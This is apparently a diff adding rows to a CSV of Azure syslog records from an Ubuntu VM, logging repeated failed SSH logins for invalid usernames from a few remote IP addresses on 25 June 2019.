+10386,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:24:37,UbuntuDevEnv,2019-06-25 23:24:37,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=196.27.127.61,58416,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,196.27.127.6,,0,
+10387,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:24:39,UbuntuDevEnv,2019-06-25 23:24:39,auth,UbuntuDevEnv,info,Failed password for invalid user bmakwembere from 196.27.127.61 port 55565 ssh2,58416,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bmakwembere,196.27.127.6,55565,,
+10388,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:24:40,UbuntuDevEnv,2019-06-25 23:24:39,auth,UbuntuDevEnv,info,Received disconnect from 196.27.127.61 port 55565:11: Bye Bye [preauth],58416,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,196.27.127.6,55565,,
+10389,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:24:40,UbuntuDevEnv,2019-06-25 23:24:39,auth,UbuntuDevEnv,info,Disconnected from invalid user bmakwembere 196.27.127.61 port 55565 [preauth],58416,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bmakwembere,196.27.127.6,55565,,
+10390,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:25:38,UbuntuDevEnv,2019-06-25 23:25:37,auth,UbuntuDevEnv,info,Invalid user stratford from 138.68.12.43 port 56442,58628,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,stratford,138.68.12.4,56442,,
+10391,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:25:38,UbuntuDevEnv,2019-06-25 23:25:37,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,58628,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10392,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:25:38,UbuntuDevEnv,2019-06-25 23:25:37,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=138.68.12.43,58628,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,138.68.12.4,,0,
+10393,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:25:40,UbuntuDevEnv,2019-06-25 23:25:40,auth,UbuntuDevEnv,info,Failed password for invalid user stratford from 138.68.12.43 port 56442 ssh2,58628,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,stratford,138.68.12.4,56442,,
+10394,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:25:40,UbuntuDevEnv,2019-06-25 23:25:40,auth,UbuntuDevEnv,info,Received disconnect from 138.68.12.43 port 56442:11: Bye Bye [preauth],58628,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,138.68.12.4,56442,,
+10395,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:25:40,UbuntuDevEnv,2019-06-25 23:25:40,auth,UbuntuDevEnv,info,Disconnected from invalid user stratford 138.68.12.43 port 56442 [preauth],58628,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,stratford,138.68.12.4,56442,,
+10396,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:26:35,UbuntuDevEnv,2019-06-25 23:26:34,auth,UbuntuDevEnv,info,Invalid user sanjay from 196.27.127.61 port 35653,58843,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sanjay,196.27.127.6,35653,,
+10397,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:26:35,UbuntuDevEnv,2019-06-25 23:26:34,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=196.27.127.61,58843,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,196.27.127.6,,0,
+10398,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:26:35,UbuntuDevEnv,2019-06-25 23:26:34,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,58843,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10399,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:26:36,UbuntuDevEnv,2019-06-25 23:26:36,auth,UbuntuDevEnv,info,Failed password for invalid user sanjay from 196.27.127.61 port 35653 ssh2,58843,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sanjay,196.27.127.6,35653,,
+10400,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:26:37,UbuntuDevEnv,2019-06-25 23:26:36,auth,UbuntuDevEnv,info,Received disconnect from 196.27.127.61 port 35653:11: Bye Bye [preauth],58843,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,196.27.127.6,35653,,
+10401,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:26:37,UbuntuDevEnv,2019-06-25 23:26:36,auth,UbuntuDevEnv,info,Disconnected from invalid user sanjay 196.27.127.61 port 35653 [preauth],58843,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sanjay,196.27.127.6,35653,,
+10402,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:27:51,UbuntuDevEnv,2019-06-25 23:27:50,auth,UbuntuDevEnv,info,Invalid user test1 from 138.68.12.43 port 44402,59105,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,test1,138.68.12.4,44402,,
+10403,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:27:51,UbuntuDevEnv,2019-06-25 23:27:50,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=138.68.12.43,59105,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,138.68.12.4,,0,
+10404,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:27:51,UbuntuDevEnv,2019-06-25 23:27:50,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,59105,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10405,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:27:53,UbuntuDevEnv,2019-06-25 23:27:53,auth,UbuntuDevEnv,info,Failed password for invalid user test1 from 138.68.12.43 port 44402 ssh2,59105,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,test1,138.68.12.4,44402,,
+10406,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:27:53,UbuntuDevEnv,2019-06-25 23:27:53,auth,UbuntuDevEnv,info,Received disconnect from 138.68.12.43 port 44402:11: Bye Bye [preauth],59105,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,138.68.12.4,44402,,
+10407,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:27:53,UbuntuDevEnv,2019-06-25 23:27:53,auth,UbuntuDevEnv,info,Disconnected from invalid user test1 138.68.12.43 port 44402 [preauth],59105,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,test1,138.68.12.4,44402,,
+10408,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:28:29,UbuntuDevEnv,2019-06-25 23:28:29,auth,UbuntuDevEnv,info,Invalid user kf2 from 196.27.127.61 port 43974,59245,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,kf2,196.27.127.6,43974,,
+10409,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:28:29,UbuntuDevEnv,2019-06-25 23:28:29,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=196.27.127.61,59245,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,196.27.127.6,,0,
+10410,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:28:29,UbuntuDevEnv,2019-06-25 23:28:29,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,59245,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10411,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:28:31,UbuntuDevEnv,2019-06-25 23:28:31,auth,UbuntuDevEnv,info,Failed password for invalid user kf2 from 196.27.127.61 port 43974 ssh2,59245,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,kf2,196.27.127.6,43974,,
+10412,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:28:31,UbuntuDevEnv,2019-06-25 23:28:31,auth,UbuntuDevEnv,info,Received disconnect from 196.27.127.61 port 43974:11: Bye Bye [preauth],59245,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,196.27.127.6,43974,,
+10413,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:28:31,UbuntuDevEnv,2019-06-25 23:28:31,auth,UbuntuDevEnv,info,Disconnected from invalid user kf2 196.27.127.61 port 43974 [preauth],59245,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,kf2,196.27.127.6,43974,,
+10414,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:30:01,UbuntuDevEnv,2019-06-25 23:30:00,auth,UbuntuDevEnv,info,Invalid user build from 138.68.12.43 port 60590,59566,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,build,138.68.12.4,60590,,
+10415,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:30:01,UbuntuDevEnv,2019-06-25 23:30:00,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,59566,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10416,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:30:01,UbuntuDevEnv,2019-06-25 23:30:00,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=138.68.12.43,59566,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,138.68.12.4,,0,
+10417,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:30:03,UbuntuDevEnv,2019-06-25 23:30:03,auth,UbuntuDevEnv,info,Failed password for invalid user build from 138.68.12.43 port 60590 ssh2,59566,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,build,138.68.12.4,60590,,
+10418,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:30:04,UbuntuDevEnv,2019-06-25 23:30:03,auth,UbuntuDevEnv,info,Received disconnect from 138.68.12.43 port 60590:11: Bye Bye [preauth],59566,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,138.68.12.4,60590,,
+10419,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:30:04,UbuntuDevEnv,2019-06-25 23:30:03,auth,UbuntuDevEnv,info,Disconnected from invalid user build 138.68.12.43 port 60590 [preauth],59566,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,build,138.68.12.4,60590,,
+10420,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:30:27,UbuntuDevEnv,2019-06-25 23:30:27,auth,UbuntuDevEnv,info,Invalid user sergei from 196.27.127.61 port 52297,59755,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sergei,196.27.127.6,52297,,
+10421,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:30:27,UbuntuDevEnv,2019-06-25 23:30:27,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=196.27.127.61,59755,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,196.27.127.6,,0,
+10422,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:30:27,UbuntuDevEnv,2019-06-25 23:30:27,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,59755,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10423,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:30:29,UbuntuDevEnv,2019-06-25 23:30:28,auth,UbuntuDevEnv,info,Failed password for invalid user sergei from 196.27.127.61 port 52297 ssh2,59755,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sergei,196.27.127.6,52297,,
+10424,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:30:29,UbuntuDevEnv,2019-06-25 23:30:29,auth,UbuntuDevEnv,info,Disconnected from invalid user sergei 196.27.127.61 port 52297 [preauth],59755,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sergei,196.27.127.6,52297,,
+10425,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:30:29,UbuntuDevEnv,2019-06-25 23:30:29,auth,UbuntuDevEnv,info,Received disconnect from 196.27.127.61 port 52297:11: Bye Bye [preauth],59755,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,196.27.127.6,52297,,
+10426,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:30:32,UbuntuDevEnv,2019-06-25 23:30:31,auth,UbuntuDevEnv,info,Connection closed by 203.195.235.135 port 54972 [preauth],59509,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,203.195.235.1,54972,,
+10427,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:30:55,UbuntuDevEnv,2019-06-25 23:30:54,auth,UbuntuDevEnv,info,Invalid user franciszek from 203.195.235.135 port 36146,59844,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,franciszek,203.195.235.1,36146,,
+10428,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:30:55,UbuntuDevEnv,2019-06-25 23:30:54,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=203.195.235.135,59844,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,203.195.235.1,,0,
+10429,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:30:55,UbuntuDevEnv,2019-06-25 23:30:54,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,59844,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10430,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:30:57,UbuntuDevEnv,2019-06-25 23:30:57,auth,UbuntuDevEnv,info,Failed password for invalid user franciszek from 203.195.235.135 port 36146 ssh2,59844,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,franciszek,203.195.235.1,36146,,
+10431,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:31:01,UbuntuDevEnv,2019-06-25 23:31:00,auth,UbuntuDevEnv,info,Disconnected from invalid user franciszek 203.195.235.135 port 36146 [preauth],59844,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,franciszek,203.195.235.1,36146,,
+10432,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:31:01,UbuntuDevEnv,2019-06-25 23:31:00,auth,UbuntuDevEnv,info,Received disconnect from 203.195.235.135 port 36146:11: Bye Bye [preauth],59844,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,203.195.235.1,36146,,
+10433,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:31:51,UbuntuDevEnv,2019-06-25 23:31:50,auth,UbuntuDevEnv,info,Invalid user sandeep from 203.195.235.135 port 45314,60057,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sandeep,203.195.235.1,45314,,
+10434,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:31:51,UbuntuDevEnv,2019-06-25 23:31:50,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=203.195.235.135,60057,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,203.195.235.1,,0,
+10435,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:31:51,UbuntuDevEnv,2019-06-25 23:31:50,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,60057,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10436,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:31:53,UbuntuDevEnv,2019-06-25 23:31:52,auth,UbuntuDevEnv,info,Failed password for invalid user sandeep from 203.195.235.135 port 45314 ssh2,60057,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sandeep,203.195.235.1,45314,,
+10437,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:31:53,UbuntuDevEnv,2019-06-25 23:31:52,auth,UbuntuDevEnv,info,Disconnected from invalid user sandeep 203.195.235.135 port 45314 [preauth],60057,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sandeep,203.195.235.1,45314,,
+10438,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:31:53,UbuntuDevEnv,2019-06-25 23:31:52,auth,UbuntuDevEnv,info,Received disconnect from 203.195.235.135 port 45314:11: Bye Bye [preauth],60057,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,203.195.235.1,45314,,
+10439,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:32:11,UbuntuDevEnv,2019-06-25 23:32:10,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=138.68.12.43  user=test,60120,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,test,138.68.12.4,,0,
+10440,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:32:12,UbuntuDevEnv,2019-06-25 23:32:12,auth,UbuntuDevEnv,info,Failed password for test from 138.68.12.43 port 48542 ssh2,60120,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,138.68.12.4,48542,,
+10441,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:32:12,UbuntuDevEnv,2019-06-25 23:32:12,auth,UbuntuDevEnv,info,Disconnected from authenticating user test 138.68.12.43 port 48542 [preauth],60120,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,test,138.68.12.4,48542,,
+10442,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:32:12,UbuntuDevEnv,2019-06-25 23:32:12,auth,UbuntuDevEnv,info,Received disconnect from 138.68.12.43 port 48542:11: Bye Bye [preauth],60120,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,138.68.12.4,48542,,
+10443,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:32:32,UbuntuDevEnv,2019-06-25 23:32:31,auth,UbuntuDevEnv,info,Invalid user server from 196.27.127.61 port 60620,60203,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,server,196.27.127.6,60620,,
+10444,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:32:32,UbuntuDevEnv,2019-06-25 23:32:31,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,60203,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10445,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:32:32,UbuntuDevEnv,2019-06-25 23:32:31,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=196.27.127.61,60203,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,196.27.127.6,,0,
